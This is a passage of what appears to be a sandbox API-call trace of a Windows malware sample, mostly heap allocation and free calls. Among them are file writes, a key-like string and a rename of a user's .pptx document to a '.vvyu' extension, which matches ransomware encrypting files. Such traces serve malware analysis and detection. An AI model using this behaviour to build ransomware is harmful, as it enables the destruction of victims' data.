Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbe0 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.657] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13d08, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13d08, lpOverlapped=0x0) returned 1 [0189.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.658] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13d0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.658] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.660] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.660] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.660] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.660] CloseHandle (hObject=0x584) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.663] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\xR3NLEX5cZvfg.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\xr3nlex5czvfg.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\xR3NLEX5cZvfg.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\xr3nlex5czvfg.pptx.vvyu")) returned 1 [0189.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.665] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.667] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44e2210, ftCreationTime.dwHighDateTime=0x1d8a124, ftLastAccessTime.dwLowDateTime=0x49174cd0, ftLastAccessTime.dwHighDateTime=0x1d8a4d6, ftLastWriteTime.dwLowDateTime=0x49174cd0, ftLastWriteTime.dwHighDateTime=0x1d8a4d6, nFileSizeHigh=0x0, nFileSizeLow=0x13d0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xR3NLEX5cZvfg.pptx", cAlternateFileName="XR3NLE~1.PPT")) returned 0 [0189.667] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0189.668] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0189.668] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) 